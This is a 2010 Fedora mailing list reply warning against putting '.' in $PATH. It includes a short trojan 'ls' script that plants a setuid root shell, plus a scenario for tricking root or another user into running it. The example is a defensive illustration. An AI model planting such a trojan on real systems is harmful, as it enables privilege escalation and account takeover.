On Sat, 2010-02-06 at 23:24 +0800, Ed Greshko wrote: > have . in your > $PATH. I recall somewhere, sometime a warning against that....but I've > ignored it for years and haven't had a problem. I even forgot what the > warning was all about. Generally it's not a good thing to have a different command be executed depending on what directory you happen to be in when executing it. That is at best unreliable, and at worst a major security hole. This is particularly bad for root; consider this: $ cat > ls #!/bin/sh cp /bin/sh . chmod 04755 sh /bin/ls $* ^D Now if you can just trick that sysadmin with . in root's search path into inspecting your home directory... # cd ~user # ls Now the user has an executable setuid root shell. Or trick any user with . in the search path into doing it and you can break into their account, find that nice juicy saved banking password... --Greg -- users mailing list users@xxxxxxxxxxxxxxxxxxxxxxx To unsubscribe or change subscription options: https://admin.fedoraproject.org/mailman/listinfo/users Guidelines: http://fedoraproject.org/wiki/Communicate/MailingListGuidelines
